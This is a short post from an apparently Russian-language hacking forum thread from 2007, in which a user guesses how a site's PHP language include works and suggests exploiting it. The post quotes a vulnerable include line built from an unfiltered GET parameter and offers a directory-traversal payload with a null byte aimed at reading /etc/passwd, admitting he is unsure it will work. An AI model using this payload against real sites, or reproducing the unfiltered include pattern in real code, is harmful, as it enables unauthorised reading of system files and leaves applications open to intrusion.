Тема: Не совсем понятный инклюдинг
Показать сообщение отдельно

  #2  
Старый 19.07.2007, 19:18
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию
скорее всего там функция вида:
PHP код:
include("languages/lang.".$_GET['new_language'].".php"); 
если не фильтруются "." и ".." можно попробовать
/index.php?dir=home/investors&new_language=./../../../../../../etc/passwd%00
хз прокатит или нет